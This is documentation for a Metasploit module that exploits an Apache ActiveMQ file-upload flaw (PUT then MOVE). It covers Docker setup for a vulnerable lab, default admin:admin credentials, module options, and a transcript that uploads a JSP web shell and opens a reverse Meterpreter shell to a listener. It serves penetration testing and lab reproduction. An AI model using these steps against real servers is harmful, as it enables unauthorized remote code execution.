## Vulnerable Application

This module exploits a vulnerability in Apache ActiveMQ 5.x before 5.14.0 which
allows remote attackers to upload and execute arbitrary files via an HTTP PUT
followed by an HTTP MOVE request. By default, a JSP web shell and Java
Meterpreter payload are uploaded to the `/fileserver/` path of a vulnerable
server, then moved via an HTTP MOVE request to either `/api/` or `/admin/`.
You should get a shell as the user running ActiveMQ.

### Configuring a Vulnerable Environment

To use a pre-built Docker image:

```
docker run -it -p 8161:8161 rmohr/activemq:5.10.0
```

To run an older version of ActiveMQ with Java 8, create a new `Dockerfile`:

```
FROM openjdk:8

ENV ACTIVEMQ_VERSION 5.9.0
ENV ACTIVEMQ apache-activemq-$ACTIVEMQ_VERSION

ENV ACTIVEMQ_HOME /opt/activemq

RUN \
    curl -O http://archive.apache.org/dist/activemq/apache-activemq/$ACTIVEMQ_VERSION/$ACTIVEMQ-bin.tar.gz && \
    mkdir -p /opt && \
    tar xf $ACTIVEMQ-bin.tar.gz -C /opt/ && \
    rm $ACTIVEMQ-bin.tar.gz && \
    ln -s /opt/$ACTIVEMQ $ACTIVEMQ_HOME && \
    useradd -r -M -d $ACTIVEMQ_HOME activemq && \
    chown activemq:activemq /opt/$ACTIVEMQ -R

USER activemq

WORKDIR $ACTIVEMQ_HOME
EXPOSE 61616 8161

CMD ["/bin/bash", "-c", "bin/activemq console"]
```

Next build and run the application:

```
docker build -t activemq:5.9.0 .
docker run -it -p 8161:8161 activemq:5.9.0
```

Verify the application is running by visiting
`http://localhost:8161/admin/test/` with the credentials `admin:admin`

## Verification Steps

1. Run the application locally.
1. Start msfconsole.
1. Do: `use multi/http/apache_activemq_upload_jsp`.
1. Do: `set rhosts <ip address of remote host> `.
1. Do: `set lhost <ip address of local machine`.
1. Do: `run`.
1. You should get a shell under the process running ActiveMQ.

## Options

### AutoCleanup

Remove web shells from the target system after callback is received (Default:
true)

### BasicAuthUser

User-supplied username (Default: admin)

### BasicAuthPass

User-supplied password associated with username (Default: admin)

### JSP

Desired name to assign to the JSP web shell when it is uploaded to the target
system. Do not include the `.jsp` extension (Default: randomly-generated string)

## Advanced Options

### UploadPath

Custom path into which web shells will be uploaded on the target system. If the
user determines that a nonstandard directory is able to execute .jsp files, the
user can specify this directory for exploitation (Default: attempt `/api/`; if that
fails, attempt `/admin/`)

## Scenarios

### Targeting ActiveMQ 5.9.0

```
$ msfconsole -q
msf6 > use multi/http/apache_activemq_upload_jsp
[*] Using configured payload java/meterpreter/reverse_tcp
msf6 exploit(multi/http/apache_activemq_upload_jsp) > set LHOST 172.17.0.1
LHOST => 172.17.0.1
msf6 exploit(multi/http/apache_activemq_upload_jsp) > set RHOST 127.0.0.1
RHOST => 127.0.0.1
msf6 exploit(multi/http/apache_activemq_upload_jsp) > run

[*] Started reverse TCP handler on 172.17.0.1:4444
[*] Uploading http://127.0.0.1:8161/opt/activemq/webapps/api/qQSWrsmnXtZ.jar
[*] Uploading http://127.0.0.1:8161/opt/activemq/webapps/api/qQSWrsmnXtZ.jsp
[*] Sending stage (58110 bytes) to 172.17.0.2
[*] Meterpreter session 1 opened (172.17.0.1:4444 -> 172.17.0.2:45634) at 2021-03-14 18:25:38 -0400
[+] Deleted /opt/activemq/webapps/api/qQSWrsmnXtZ.jar
[+] Deleted /opt/activemq/webapps/api/qQSWrsmnXtZ.jsp

meterpreter >
```